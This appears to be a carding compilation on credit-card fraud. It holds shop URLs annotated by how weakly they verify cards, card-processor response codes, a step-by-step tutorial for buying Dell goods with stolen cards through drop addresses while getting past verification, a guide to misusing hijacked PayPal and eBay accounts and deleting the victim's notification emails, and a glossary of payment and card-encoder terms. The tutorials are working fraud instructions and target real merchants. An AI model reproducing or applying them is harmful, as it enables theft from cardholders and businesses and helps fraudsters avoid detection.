+http://www.elmusic.co.uk/
+http://www.wembleydrumcentre.com/index.php?fuseaction=shopping.details&pId=14659&cId=3
+http://www.giggear.co.uk/b/Gibson/?gclid=CJv5rqKI9ZkCFQIWFQodP1nbRw
+https://www.rainbowmusic.co.uk/sess/utn;jsessionid=1549e6f78956b77/shopdata/index.shopscript
+http://www.thinkmusic.co.uk/prodtype.asp?
+PT_ID=154&strPageHistory=cat&gclid=CIPIx_GI9ZkCFRMFZgodgCNJQw
+http://www.bonnersmusic.co.uk/browse/Guitars__and__Basses/Acoustic_Guitars/Gibson_Guitars
+http://www.hollywood-music.co.uk/products.php?product=Gibson-Hummingbird-Modern-Classic-
+Acoustic-Guitar
+http://www.soundsmusical.com/product.asp?productid=2206
+http://www.froogle.richersounds.com/showproduct.php?cda=showproduct&pid=MONS-BEATS-BY-
+DR-DRE
+http://www.iheadphones.co.uk/headphones/23820/Monster+Beats+by+Dr+Dre+High+Definition+Studio
++Headphones.htm
+http://www.tribaluk.com/detail.php?
+
+ProdID=16cz0022&referrer=aw&utm_source=affiliatewindow&utm_medium=cpa v and mc
+http://www.24electric.com/detail.php?
+ProdID=83CZ9977&referrer=wg&source=webgains&siteid=4761&utm_source=webgains&utm_medium
+=cpa&utm_content=All v and mc
+http://www.bennettsonline.co.uk/product.asp?
+activeproduct=16CZ0022&utm_source=affiliatewindow&utm_medium=cpa v and mc BK
+http://shop4blu-ray.co.uk/catalog/product_info.php?
+cPath=29&products_id=86&osCsid=5c87238a958085c2941600af02057f0e
+http://www.hifiheadphones.co.uk/technics-rpdj1200-pro-dj-headphones-in-black-dj1200-dj-prodid-
+293.html
+http://www.studica.com/products/product_detail.cfm?productid=59470&storeid=4
+http://www.ableton.com/pages/shop/full INTER
+http://www.htfr.com/more-info/MR219186
+http://www.chemical-records.co.uk/sc/servlet/Info?ref=gbase&Track=CDN88
+http://www.djpro.co.uk/product_info.php?
+products_id=1371&shpsessid=b93b78e747e4186f298d6b2c92b080ca
+http://www.decks.co.uk/products/video_jockey/numark
+http://www.disco-centre.co.uk/discoequipment.html?gclid=CM-GwJWS9ZkCFQSwFQodrg0FRQ
+http://www.bananadj.com/product12236_32440.aspx
+http://www.turnkey.co.uk/product.php?itemid=7826
+https://www.studiocare.com/store/index.php?main_page=index&manufacturers_id=66
+http://www.studiospares.com/DJ-CD-Players/Pioneer-CDJ800-Mkii-DJ-CD-Player/invt/285540
+http://www.homedj.co.uk/ebuttonz/ebz_product_pages/pioneer_cdj800mk2.shtml?googlecpc
+http://www.udmdjstore.co.uk/details.asp?ProductID=31130 v and mc
+http://www.catapult.co.uk/products/DJ%20Equipment/PC%252FDigital
+%20DJ/Numark+Total+Computer+DJ+in+a+Box
+http://www.bosstunes.co.uk/djgear/catalog.php?keyword=numark low sec
+http://www.prosound-dj.com/index.php?
+manufacturers_id=22&osCsid=43d8c10b1d81b071f70df04913fb9f82
+http://www.westenddj.co.uk/productlist.asp?mk=numark
+http://www.djgearpro.com/pioneer-cdj1000-digital-deck-p-47.html
+http://www.djanddiscostuff.com/category.asp?catid=2
+http://www.djsuperstore.co.uk/item/dj-cd-mp3-players/068366-pioneer-cdj1000-mk3-single-cd-mp3-
+player-%C2%A3899.00
+http://www.getinthemix.co.uk/index.htm/act/shop/process/cat/startnum/1/endnum/211/highlight/2/crit/cdj
+1000/search/true?gclid=CJXUw_-W9ZkCFQVxFQod1huWQw
+http://www.electroniccentre.co.uk/sub-section.aspx?title=DJ%20Equipment&title2=CD%20and
+%20MP3%20Decks&id=
+http://www.qualitydj.co.uk/pioneer-djm-600-p-55.html v and mc
+http://www.thomann.de/gb/pioneer_djm_400.htm
+http://www.djdevices.com/djequipment/Ecler_DJ_Mixers.html (mixers only)
+http://www.soundlightltd.com/proddetail.php?prod=6067
+http://djempire.co.uk/product/pioneer-cdj-800-mk2-and-djm-400-package
+http://www.avsl.co.uk/shop/cdj800-mk2-digital-cd-deck-with-scratch-jog-wheel-p-5789.html
+http://www.total-music.com/catalogue.php?product_id=2730
+http://www.yonies.com/pidD.asp?
+
+chk=1&PID=2595&manf=Technics&model=SLDZ1200&prd=Turntable&lv1=Electronics&lv2=DJ+Equ
+ipment&lv3=Turntables&rf=frguk inter
+http://www.tamarshop.co.uk/index.php?
+main_page=product_info&products_id=575&zenid=2b4bc645b985814785de763c851ba99c
+https://www.scotaudio.com/acatalog/Technics_SL1200.html
+http://www.discostudio.co.uk/item.php?upn=11305&affid=froogle v and mc
+http://www.hifibitz.co.uk/product.asp?id=6681&aid=15036 bk v and mc
+http://www.soundandvision.co.uk/hifi/turntables/technics-sl-1200mk5
+http://www.proav.co.uk/Audio-Equipment/c534.aspx
+http://www.superfi.co.uk/index.cfm/page/moreinfo.cfm/Product_ID/1471/?utm_source=nextag
+http://www.andertons.co.uk/PAMixers/pid15475/cid622/BoseL1SystemT1ToneMatchAudioEngineMixer
+.asp
+http://www.kmraudio.com/catalogue/product_info.php?products_id=620
+http://www.reverb-store.co.uk/product-detail.asp?prod=2442
+http://www.creativevideo.co.uk/public/view_item_cat.php?catalogue_number=apple_logic_studio
+http://www.andertons.co.uk/MusicSoftware/pid9682/cid611/AppleLogicStudio8.asp
+http://audiocooker.co.uk/shop/article_188/Apple-Logic-Studio-8.html
+http://www.prolineaudio.co.uk/shopsub3.asp?submenu3=BHSX2442FX
+http://www.ashcroft.absolutewebhosting2.co.uk/prod1.asp?ID=275
+http://www.andyou.co.uk/productdetail.asp?ProductID=TYROS3&title=Yamaha+Tyros+3
+http://shop.etsnet.co.uk/citronic-sm500-ultima-professional-mixer-38-p.asp
+http://www.rosemorris.com/categories/Keyboard_Amplifiers/Keyboard_Amplifiers.html
+http://www.overstock.com/Electronics/Pyle-PT4001X-5500-watt-Professional-DJ-
+Amplifier/3818324/product.html?cid=133635
+http://www.thegreenwellystop.co.uk/whiskyshop/collectable/cat_4.html
+http://www.masterofmalt.com/distilleries/allt-a-bhainne-whisky-distillery/
+http://www.4golfonline.com/bushnell-golf-m-40.html no v
+http://www.golf-direct.co.uk/bushnell-neo-gps-golf-rangefinder-i5701.html no v
+http://www.golfonline.co.uk/bushnell-golf-scope-rangefinder-p-3619.html amx axpt
+http://www.nevadabobs.co.uk/Gadgets/Range-Finders/77scid/5972prodid.asp
+http://www.thegolfshoponline.co.uk/index.cfm?
+fuseaction=main.dspSingleProduct&productId=789&gclid=CLemnayo5Z0CFZQA4wodcAJ3MA no v
+http://www.sheffieldprogolf.co.uk/Bushnell.html?gclid=CJTLxMOo5Z0CFWlr4wodTwhVMA amc acpt
+http://www.tomorrowsgolfer.co.uk/products/Bushnell-Tour-V2-Laser-Rangefinder-Pinseeker.html no v
+http://www.justgolfonline.co.uk/accessories/new-bushnell-tour-v2-rangefinder-p-1622.html ptx
+http://www.binoculars-uk.co.uk/acatalog/Bushnell_Yardage_Pro_V2.html ptx amx acpt
+http://www.nickylumb.com/superstore/itemdetl.php/itemprcd/01PR8401-1SZE no v
+http://www.thegolfstore4u.co.uk/bushnell-tour-v2-laser-rangefinder-with-pinseeker-technology-p-
+220.html ppal amx acpt
+http://www.0800gadgets.co.uk/product.php/65100/267 ptx
+http://golfclubseurope.co.uk/proddetail.php?prod=BNTV2LR no v
+http://www.davidpartridgegolf.com/index.php?
+page=shop.product_details&flypage=flypage.tpl&product_id=19&category_id=11&option=com_virtuem
+art&Itemid=31&vmcchk=1&Itemid=31 no v
+http://www.greavessports.com/tour-v2-rangefinder-p32299 no v
+http://www.foot-steps.uk.com/section/21/1/golf_gps amx acpt
+http://www.hdickinson.co.uk/product_page.php?id=83 ppal amx acpt
+http://www.eventcaddie.com/bushnell-laser-range-finders.htm amx acpt
+http://www.completegolfer.co.uk/cg7/store/comersus_listItems.asp?idCategory=196
+http://www.snaintongolf.co.uk/product.php/1707/skycaddie_sg2_5_range_finder ptx amx acpt
+http://www.golffortune.co.uk/en/user?destination=cart%2Fcheckout inter
+http://www.mensgiftshop.com/acatalog/golf-gifts.html v and mc
+http://www.buysport.co.uk/ no v
+http://www.onestopgiftshop.co.uk/c/grid/1/2/12/181/Gifts
+http://www.tonyvalentine.com/ no v
+http://www.golfwholesaledirect.com/shop/index.php?
+
+cPath=30_82&osCsid=2ea7fc95d1ad7ed53ea48bb3cd174072 no v
+http://www.golf247.co.uk/cobra-irons-steel-2010-model-p-946.html?affiliate_banner_id=1&ref=9
+http://www.118golf.co.uk/Golf-Accessories/GPS-Rangefinders/prodlist_ct337.htm ptx
+http://www.jamgolf.com/uk/finder/all/gps-devices/any/1 no v
+http://www.gpsw.co.uk/?gclid=CMS55Lmt5Z0CFUQA4wodHAJ5Kw
+http://www.snooperuk.com/snooper_products/gps_golf_shot_saver_range_finders/index.html no v
+http://www.maximusgolf.co.uk/product.php/1187/skycaddie-sg-2-5-gps-black-golf-
+rangefinder/dbca162d535b370bcec75ced581aa99d no v
+http://www.americangolf.co.uk/golf-equipment/golf-accessories/golf-practice-aids---gadgets/skycaddie-
+sg2-5-gps-range-finder/ no v
+http://store.europeantour.com/stores/eurotour/products/product_browse.aspx?category%7Ccategory_root
+%7C9698=balls+&+accessories&category%7Ccat_9698%7C9730=gps%2Frange+finders amc acpt
+http://www.merlinlazer.com/Laser-Distance-Measurement-2?gclid=CIqQ0Yiu5Z0CFVtn4wodlh8dLg no
+v
+http://www.planetgolfuk.co.uk/shop/Monocular-Distance-Finder-p-18117.html no v
+http://www.golfbidder.co.uk/golf-accessories/102/golf-range-finders.html no v
+http://golf-gift.co.uk/store/catalog/Longridge-neoprene-iron-covers-p-16263.html ptx
+http://www.golfizus.co.uk/ishop/1094/shopscr93.html
+http://www.teedoff.co.uk/catalog/product.aspx?search=true&cid=703&pid=93611 ppal amx acpt
+http://www.uttings.com/?categories/Rangefinders/bushnell/ no v
+LIQ
+http://www.parkerswhisky.co.uk/ ptx amx acpt
+http://www.drambusters.com/
+http://www.maltwhiskyonline.com/
+http://www.whisky-online.com/ amc acpt
+http://www.whiskyshop.com/
+https://www.lfw.co.uk/acatalog/ v and mc antica
+http://www.whiskyshack.com/
+http://www.ocado.com/webshop/product/Laphroaig-10-Year-Old-Single-Islay-Malt-Whisky/16554011?
+parentContainer=|22000|22717|22864|22871
+http://www.bakersandlarners.co.uk/
+http://www.mensgiftshop.com/acatalog/binoculars.html definet GOER max 3 notes up to 5 notes
+http://www.skyviewoptics.co.uk/categories.asp?pg=545&tl=0
+http://www.camera-shop.co.uk/acatalog/Bushnell_Digital_Camera_Binoculars.html
+http://www.campkinsonline.com/99/Nikon-Travelite-EX-10X25.html?referrer=Froogle
+http://www.scottcountry.co.uk/products_detail.asp?productID=2861
+http://www.alloutdoor.co.uk/bushnell-permafocus-10x50-auto-focus-binoculars-2557-p.asp
+http://www.adventurekit.co.uk/acatalog/Telescopes.html (telescope option)
+http://www.ukcamo.com/StoreFrontProfiles/DeluxeSFItemDetail.aspx?
+sfid=151943&c=167269&i=240590879
+http://www.flightstore.co.uk/DEPT-BIN/use/price.30-50
+http://www.uttings.com/?Categories/Optics/Binoculars/
+http://www.cabelas.com/cabelas/en/templates/purchase/item-added.jsp?_requestid=2668 inter
+http://www.green-witch.com/acatalog/Swarovski.html?gclid=CJOCkIGH-pkCFUM-3godH0k9GA
+http://www.harrisoncameras.co.uk/productdetail.kmod?productid=6060
+http://www.wilkinson.co.uk/store/product.php?productid=17720
+http://www.sportsmanguncentre.co.uk/productDetails.php?
+categoryId=11712990177266&product=Leica+BR+Ultravid+8x20+Compact
+http://www.purelygadgets.co.uk/showproduct.php?prodid=9981&wysiwyg=10 v and mc
+http://www.harpersphoto.co.uk/product/opticron_8x32_zcf_ga_imagic_tga_wp_porro_prism_binoculars/
+hs v and mc
+http://www.at-infocus.co.uk/opticron.html
+
+http://www.mynewcheap.co.uk/products/details/bushnell-h2o-binoculars-10x-25mm-13-1005/10659/ hs v
+and mc
+http://www.opticsale.com/zhumell-7x50-marine-binoculars-w-compass.html inter
+http://www.obm.co.uk/products/db/454.htm
+http://www.gamefayre.co.uk/index.cgi?d=4&ref=Google-Ad
+campkinsonline
+acecameras
+pennineonline
+theclassiccamera (lenses)
+opticsplanet inter
+astroshop
+cameraking
+survsys (laser testing equipment)
+parkcameras
+microglobe
+allcam
+bristolcameras
+purelygadgets
+ukoptics
+binocularsshop
+telescopesandbinoculars
+eebc
+morrisphoto
+rgb-tech
+lambda-tek
+microglobe
+the-binoculars-store
+scopesnskies
+cliftoncameras
+at-infocus low sec
+safari-store
+green-witch
+buzzoptics
+rspboptics
+swillingtonshootingsupplies.
+leicashop inter
+uttingsoutdoors
+cameras2u
+westwalesbinoculars BK v and mc
+grahamsonline
+cameramarts
+binocularbarn
+alanaecology
+allcam
+ukdigitalcameras
+ukdigital
+ukoptics possible connection with above
+acecameras
+devoncamera bk v and mc
+photosolution
+phonescorporation
+simplyelectronics v and mc
+dalephotographic
+martinscamerashop
+harrisoncameras
+purelygadgets
+
+t4cameras
+wilkinson v and mc
+mifsuds low sec
+calumetphoto
+digitalcameraexchange
+cameraworld
+jacobsdigital v and mc
+bitesizedeals
+bccamera inter
+simplyelectronics v and mc
+camerabox
+abc-digital-cameras
+bentonvillemall v and mc
+pixmania
+cordless-phones v and mc
+bestcameras
+http://www.hairstyling.co.uk/acatalog/Straighteners.html
+http://www.uksellmart.co.uk/
+http://www.ghdhairstores.co.uk/?gclid=COT71qXbtJoCFQZqswoddk06cg
+http://keenbuy.co.uk/keenbuy/index.php?act=viewProd&productId=3
+http://enzohairandbeauty.myshopify.com/products/ghd-pure
+beautyflash
+hairsupermarket sec
+beautique
+gorgeousshop
+great hair direct
+ghdhairproducts
+hqhair
+skincareukcentre
+ilovemyghd
+asos
+brindleys-hair
+feelunique
+heaven-spa
+ghd-uk
+abcbeautyshop
+candyaddicted bk v and mc
+paulkayhairproducts sec v and mc
+besthairbrands bk v and mc
+beautybay
+salonskincare
+francescogroup
+slapiton.tv
+saloneasy
+hair1ukonline
+body4real
+ehaircare
+justbeautifully v and mc
+missbollywood
+beautysleuth v and mc
+prohaircare
+assetchemist
+prosalonsupplies
+beautybay
+buywiseuk v and mc
+wantthelook
+
+exclusivebeauty
+lookfantastic
+powderpuff
+folica inter
+Card/ATM Reading Codes
+EFTI Transaction Response Codes:
+Response Processor Description
+700 EFTI Completed Successfully
+01 EFTI Refer to card issuer
+02 EFTI Refer to card issuer, special condition
+03 EFTI Invalid Merchant
+04 EFTI Pick-up card
+05 EFTI Do not honor
+06 EFTI Error
+07 EFTI Pick-up card, special condition
+08 EFTI Honor with identification
+09 EFTI Request in Progress
+10 EFTI Approved, partial
+11 EFTI Approved, VIP
+12 EFTI Invalid transaction
+13 EFTI Invalid amount
+14 EFTI Invalid card number
+15 EFTI No such issuer
+16 EFTI Approved, update track 3
+17 EFTI Customer cancellation
+18 EFTI Customer dispute
+19 EFTI Re-enter transaction
+20 EFTI Invalid response
+21 EFTI No action taken
+22 EFTI Suspected malfunction
+23 EFTI Unacceptable transaction fee
+24 EFTI File update not supported
+25 EFTI Unable to locate record
+26 EFTI Duplicate record
+27 EFTI File update edit error
+28 EFTI File update file locked
+29 EFTI File update failed
+30 EFTI Format error
+31 EFTI Bank not supported
+32 EFTI Completed partially
+33 EFTI Expired card, pick-up
+34 EFTI Suspected fraud, pick-up
+35 EFTI Contact acquirer, pick-up
+36 EFTI Restricted card, pick-up
+37 EFTI Call acquirer security, pick-up
+38 EFTI Pin tries exceeded, pick-up
+39 EFTI No credit account
+
+40 EFTI Function not supported
+41 EFTI Lost Card
+42 EFTI No universal account
+43 EFTI Stolen Card
+44 EFTI No investment account
+51 EFTI Not sufficient funds
+52 EFTI No check account
+53 EFTI No savings account
+54 EFTI Expired card
+55 EFTI Incorrect PIN
+56 EFTI No card record
+57 EFTI Transaction not permitted to cardholder
+58 EFTI Transaction not permitted on terminal
+59 EFTI Suspected fraud
+60 EFTI Contact acquirer
+61 EFTI Exceeds withdrawal limit
+62 EFTI Restricted card
+63 EFTI Security violation
+64 EFTI Original amount incorrect
+65 EFTI Exceeds withdrawal frequency
+66 EFTI Call acquirer security
+67 EFTI Hard capture
+68 EFTI Response received too late
+75 EFTI PIN tries exceeded
+77 EFTI Intervene, bank approval required
+78 EFTI Intervene, bank approval required for partial
+90 EFTI Cut-off in progress
+91 EFTI Issuer or switch inoperative
+92 EFTI Routing Error
+93 EFTI Violation of law
+94 EFTI Duplicate transaction
+95 EFTI Reconcile error
+96 EFTI System malfunction
+98 EFTI Exceeds Cash limit
+Carding Dell Tutorial
+something to prepare:
+1. Fresh Drop (if ur drop is blacklist in DELL u won't pass even ur CC is good)
+2. Good CCV (non-VBV or non-MSC)
+3. Sock / VPN / SSH / VPS (tis not important, but good sock at same state of CC is better)
+Now, let start:
+A - If You Want To Make Only Single Order With Single Cvv2 ( Which is Valid and virgin Ofcourse !! )
+1- first check the cc and make sure it`s Valid .. choose Your Item (Fast-track items)
+2- Click On Add To Cart Then Check Out , You Will Be Prompted To Sign Up For A New User Or Sign
+
+In If You Have An Existing Account ( Sign Up For A New Account )
+3- Enter The First And Last Name For Your Drop As The Account First And Last Name In The Sign Up
+Page , Provide A Valid Email address And Password .
+4- You`ll Be Redirected To The Shipping Info Page , You`ll Find The First Name and Last Name
+Provided In The Sign Up Page Stored There , Just Add The Address and Other Info
+*Note : You Don`t Have To Provide A Valid Phone Number For Shipping Address , The Billing Phone
+Also Works For Shipping
+5- Choose The Fastest Shipping Method (Next Day Air ) Also 2nd Day air will work , but Make Sure The
+Total Amount Doesn`t Exceed 470-480 $
+6- On The Billing Page , Remove The Shipping Info Stored . Then Add The Billing Info Which Must Be
+Same As stored In Bank ( Make Sure The CC Is 100 % Valid ) The Most IMPORTANT PART HERE IS
+THE BILLING PHONE NUMBER
+which must be the same stored with bank coz they use this number for verification ( not calling the card
+holder , but to verify the info with bank )
+7- Don`t Choose Any Limit In The Billing Page ( Choose:No Limit )
+Click Submit !!
+B- IF You Intend To Use The Same Card More Than Once To Order More Than 1 Item ;
+*First Note That This Method May Get You In Trouble If You Send These Items To Your Own Home ,
+Also the items May get returned to shipper before You Recieve Them .
+1- Follow The 1st Method For Ordering Single Item With 1 Cc , you`ll recieve 2 emails after ordering
+( Dell Order Acknowledgement - Dell Order Confirmation ) as soon as You Recieve The Second Email
+Which Is : Dell Order Confirmation
+check the order status in 10 - 30 minutes IF You See Something Like (In-Production Or Pre-Production )
+Go To The Next Step .
+2- Make Another Order and which must not exceed 480 $
+3- Follow All Previous Steps ( Storing Your Credit Card Info Will Ease The Mission )
+4- Repeat This For As Many Times as The Limit Of The CC Allow .
+5- Don`t Make Any Orders If The Previous Order Status Isn`t ( In-Production OR Pre-Production )
+6- If They Suspect One Of The Orders They Will Cancel All Orders . Ofcourse Next Day Shipping
+Method Will Decrease The Chance Of Getting Items Returned To Shipper .
+That`s All , And Enjoy Your Carding Of DELL
+P/s:
+1. iIf U don't want to get problem with VBV or MSC, use Lolifox browser,with this browser Dell won't
+ask u for VBV even though your CC is VBV, where to get it... Google is ur friend (try and see, its my
+trick in DELL )
+2. if you recieve the Hold payment emails, don't abandon it, try to chat with DEll's customer service, and
+
+tell them u want to give new CC for your order, then give them new CCV infomation (this time they don't
+check VBV or MSC)
+3. with my experience, find Credit Signature CC, its have more % success
+Carding Stuffs with PayPal
+Required components:
+1. Paypal [Us + verified + mail + instant]
+2. EBay ACC with good feedbacks, preferably from 100, not an asset (preferably 6 months or more).
+3. Good socks (and better Dedicated server)
+4. enroll FIA card Services, or simply ACC FIA can be found on the link ibsnetaccess.com (or other
+suitable)
+working with eBay accompaniment:
+1. Changing soap on their pre-creation.
+2. Deleting from old evidence
+3. Possible also pass change
+All letters will be sent to your soap
+What to do with enroll:
+1.Going to roll, change the address for loot.
+2.Push Shop Safe
+3.Generating virtual cards for 3-6 bucks.
+4.Writing number of creeds and Old about it. (Address loot think is already there, then roll the name of
+the Holder is not involved)
+5.Going on a stick, copy the name of the Holder (in handy later).
+6.Finding click add or edit credit card info
+7. Trying to drive there creed without changing the name of the Holder paragraphs, but trying to drive a
+mail drop, the one on the roll. Cards immediately will confirmed.
+Total - we stick with confirm address loot.
+Next:
+1. Checking much stick gives send through instant transfer. Ie trying to send a 300-500 bucks invented
+mail. the amount depends on the material.
+2. Ok Checked, for example sends a 500
+3. Going on eBay. Choose any pack within this amount is absolutely from any vendor, at least at the shop
+goes online to eBay.
+4. Pushing buy it now, go to the payment before the payment there you can enter the address where to
+send, and so we press on the change address
+Insert the name and address of the Holder stick drop, the phone adding is not necessary.
+5. Pushing to pay. Proceed to a confirmation page charges.
+6. Pushing Confirm, wait, appears Checkout complete.
+7. After payment go to the Soap Holder, delete the letter for payment, adding @paypal.com in black.
+ready. waiting for a track on the soap breaks the track or in another way, faster.
+as we have the official payment system through eBay, and not split-we can see the View order details in
+
+front of the item purchased in box won (List purchased).
+Track there will be faster.
+Also possible to work through the bank. ACC. but this is a somewhat different topic.
+Good Luck to all carders.
+Carding Terms
+AMVA--Association of American Motor Vehicle Agencies
+ACCOUNT NUMBER--A unique sequence of numbers assigned to a cardholder account that identifies
+the issuer and type of financial transaction card.
+ACQUIRER--A licensed member that maintains the merchant relationship and acquires the data relating
+to a transaction from the merchant or card acceptor and submits that data into interchange, either directly
+or indirectly.
+ADDRESS VERIFICATION SERVICE--A fraud prevention tool designed for mail order, telephone
+order and Internet transactions.
+AMC--American Magnetics Corporation
+AUTHORIZE--A process defined in operations regulations whereby a transaction is approved by or on
+behalf of an issuer; commonly understood to be receiving a sales validation by the merchant, by
+telephone, or authorization terminal.
+AUTOMATED TELLER MACHINE (ATM)--An unattended, magnetic stripe-reading terminal that
+dispenses cash; accepts deposits and loan payments; enables a bank customer to order transfers among
+accounts and make account inquiries.
+BANKCARD--A debit or credit card issued by a bank or other financial institution, such as a MasterCard
+card or Visa card. BIOMETRICS--Biometrics utilize "something you are" to authenticate identification.
+This might include fingerprints, retina pattern, iris, hand geometry, vein patterns, voice password, or
+signature dynamics. Biometrics can be used with a smart card to authenticate the user. The user's
+biometrics information is stored on a smart card, the card is placed in a reader, and a biometrics scanner
+reads the information to match it against that on the card. This is a fast, accurate, and highly-secure form
+
+of user authentication.
+BIT (Binary Digit)--The smallest unit of information in a binary system: a 1 or 0 condition.
+BPI--Bits Per Inch.
+BYTE--A binary clement string functioning as a unit. Eight-bit bytes are most common. Also called a
+"character".
+BUSINESS CARD--A Business card is similar to the Corporate card, but issued to a business with a few
+employees and where each employee is responsible for their purchases.
+CARDHOLDER--The customer to whom a card has been issued or the individual authorized to use the
+card.
+CARDING--Credit card fraud. Carding texts offer advice on how to make credit cards, how to use them,
+and otherwise exploit the credit card system.
+CASH DISBURSEMENT--A transaction that is posted to a cardholder's credit card account in which the
+cardholder receives cash at an ATM, or cash or travelers checks at a branch of a member financial
+institution or at a qualified and approved agent of a member financial institution.
+CIRRUS SYSTEM INCORPORATED--A wholly owned subsidiary of MasterCard International
+Incorporated, operates the international ATM sharing association known as "Cirrus® ATM Network."
+CLEANING--The process of exchanging financial transaction details between an acquirer and an issuer
+to facilitate posting of a cardholder's account and reconciliation of a customer's settlement position.
+CO-BRANDED CARD--A credit card issued by a member bank and a merchant, bearing the "brand" of
+both.
+CARDJET CARDS--Teslin®-based, CR-80 size cards with a surface that is specially formulated for
+thermal inkjet printing. CardJet Inks bond to cards and dry instantly, without smearing. CardJet cards
+stand up well to abrasion, dye-migration and UV fading.
+
+CHECK READER--A peripheral device used to read encoded information on a check to be transmitted
+and processed by a computer or register for authorization and approval.
+COERCIVITY--The measure of how much magnetic force is needed to change the state of a magnetized
+element. The higher the coercivity, the more force is needed. There are two types of magnetic stripe
+cards, low coercivity and high coercivity. While low coercivity cards can be erased if they get too close to
+a common magnet, high coercivity cards are not as easily erased.
+COLOR MATCHING--Several color matching options are included with FARGO Card Printer/Encoders.
+These options are built directly into the printer driver so they are easily selected. Colors print with more
+clarity, detail, and accuracy.
+COLOR MONITOR--A monitor that displays data and graphics in color. Color monitors vary in the
+number of colors, dot-pitch and intensities they can produce.
+COMMPORT--Communications Port. Most IBM compatible computers have from one to four
+commports used to communicate with devices attached to the computer (COM1, COM2, COM3, COM4).
+You need a commport to communicate with the 712 Encoder.
+COMMUNICATION PROTOCOL--The rules governing the exchange of information between devices
+on a data link.
+CONTACT SMART CARD ENCODER--The contact smart card encoder connects the ISO contact pins
+mounted on the e-card docking station to a Gemplus GemCore 410 smart card coupler mounted inside the
+printer. The GemCore 410's digital I/O is converted to a RS-232 signal which is accessible to application
+programs through a dedicated DB-9 port on the outside of the printer labeled "Smart Card."
+CONTACTLESS SMART CARD ENCODER--The contactless smart card encoder connects an antenna
+mounted on the e-card docking station to a Gemplus GemEasyLink 680SL coupler mounted inside the
+printer/encoder. Application programs can access Mifare® contactless cards via a RS-232 signal through
+a dedicated DB-9 port on the outside of the printer labeled "Mifare/Contactless."
+CONTROL NUMBERS--Measure card usage and be used as a tracking device if the card is lost. ID
+Services will print these on cards after the numbers have been supplied.
+
+CREDIT CARD AUTHORIZATION--The process in which a credit card is accepted, read and approved
+for a sales transaction. Credit card authorization is normally accomplished by reading a credit cared
+through a credit card reader that is integrated into a register or stand-alone reading device. Generally,
+pertinent credit information is transmitted via a modem and telephone line to a credit card
+"clearinghouse". The clearing house (authorization source) communicates with the credit card’s bank for
+approval and the appropriate debit amount of the sale.
+CREDIT CARD READER (Magnetic Stripe Reader)--A device that reads the magnetic stripe on a credit
+card for account information to automatically be processed for a transaction. A credit card reader is either
+integrated into a register, attached onto a register as a separate component or is part of a stand-alone
+terminal dedicated for the sole function of processing credit card transactions.
+CURSOR--A blinking symbol on the screen that shows where data may be entered next.
+CUSTOMER POLE DISPLAY--A peripheral device designed to show customers information about their
+transaction. This information normally consists of a description and price of the product they are
+purchasing. Customer pole displays are also used to display marketing information and other messages.
+COMMERCIAL CARDS--This is the formal name for a group of cards issued to businesses, commercial
+organizations and governments. Types of commercial cards include: Corporate Card, Purchase Card, and
+Business Card. Corporate card A Corporate card is usually issued to the employees of a corporation,
+where the corporation assumes all liability for the card's usage. These tend to be to larger corporations.
+CURRENCY CONVERSION--The process by which the transaction currency is converted into the
+currency of settlement or the currency of the issuer for the purpose of facilitating transaction
+authorization, clearing and settlement reporting. The acquirer determines the currency of the transaction;
+the currency of the issuer is the preferred currency used by the issuer, and most often, the currency in
+which the cardholder will be billed.
+DEBIT CARD--A plastic card used to initiate a debit transaction. In general, these transactions are used
+primarily to purchase goods and services and to obtain cash, for which the cardholder's asset account is
+debited by the issuer
+DECODE--A term used to describe the process of interpreting scanned or "read" information and
+presenting it in a usable fashion to the computer.
+DENSITY--Defined in bits per inch (BPI), recording density is the number of information bits which are
+recorded on one inch of a magnetic strip.
+
+DIRECT THERMAL--Direct thermal is a printing technology method in which the printer utilizes a
+paper that reacts chemically to heat. The label rolls are coated with a thermo-sensitive layer that darkens
+when exposed to intense heat. Direct thermal printers require no ink or ribbon and are typically used
+when a bar code label needs to endure for a year or less.
+DIRECT-TO-CARD (DTC) PRINTING--The Direct-to-Card printing process prints digital images
+directly onto any plastic card with a smooth, clean, glossy PVC surface.
+DISKETTE / FLOPPY DISK--A flexible disk which holds information that can be read by the computer.
+DOS (Disk Operation System)--The standard operation system for all computers advertised as "IBM
+Compatible".
+DOT-MATRIX PRINTER--A printer that forms characters or images using a matrix of pins that strike an
+inked ribbon.
+DOWNLOADING--The process of sending configuration parameters, operating software or related data
+from a central source to remote stations.
+DPI (dots per inch)--Measurement of a printer's resolution. Example: 600 dpi indicates that the printer can
+produce 600 dots of color in each inch of a card. NOTE: When judging color reproduction for a CardJet
+Card Printer, the inkjet resolution must be at 2400 dpi or better to achieve the color equivalent of a 300
+dpi dye-sub printer.
+DUAL HOPPERS--Select FARGO Card Printer/Encoders provide a dual-stack, 200 card capacity Card
+inp<-b>ut Hopper. This unique dual hopper allows you to load up to 200 of the same type of card for
+maximum card production or allows you to load a different stack of cards into each hopper for added
+versatility and efficiency. Loading two different stacks of cards is often beneficial if, for example, you are
+using two types of preprinted card backgrounds (i.e. gold cards versus silver cards) in order to more easily
+distinguish between two types of members, employees, students, etc.
+DUAL TRACK--A type of credit cared reader that is capable of reading both Track 1 and 2 on a credit
+card.
+DYE-SUBLIMATION--Dye-sublimation is the print process FARGO Card Printer/Encoders use to print
+smooth, continuous-tone, photo-quality images. This process uses a dye-based ribbon roll that is divided
+into a series of color panels. The color panels are grouped in a repeating series of three separate colors
+
+along the length of the ribbon: Yellow, Magenta, and Cyan (YMC). As the ribbon and card pass
+simultaneously beneath the Printhead, hundreds of thermal elements heat the dyes on the ribbon. Once the
+dyes are heated, they vaporize and diffuse into the surface of the card. Varying the heat intensity of each
+thermal element within the Printhead makes it possible for each transferred dot of color to vary saturation.
+This blends one color into the next. The result is continuous-tone, photo-realistic color images.
+E-CARD DOCKING STATION--FARGO provides an optional e-card docking station on select models
+that can be ordered with encoders for one, two or three different types of e-cards. These printer/encoders
+allow application software to read and/or store information in the memory of e-cards. The optional
+encoders provide everything needed for an application program to communicate with a specific type e-
+card through a standard RS-232 interface. The FARGO e-card docking station comes standard with the
+read/write pins (as defined by ISO) needed to communicate with contact smart cards. The e-card docking
+station can also be ordered with a magnetic stripe encoder for either an ISO magnetic stripe that supports
+dual high/low coercivity tracks 1, 2 and 3 or a JIS II magnetic stripe.
+E-CARD ENCODER--Select FARGO Card Printer/Encoders support reading and/or storing information
+in up to three different types of e-cards: ISO 7816 contact smart cards, Mifare® contactless smart cards
+and HID proximity cards.
+EDGE-TO-EDGE--Refers to the maximum printable area on a card. Printer/Encoders with edge-to-edge
+printing capability can print just to the edge of a card resulting in printed cards with virtually no border.
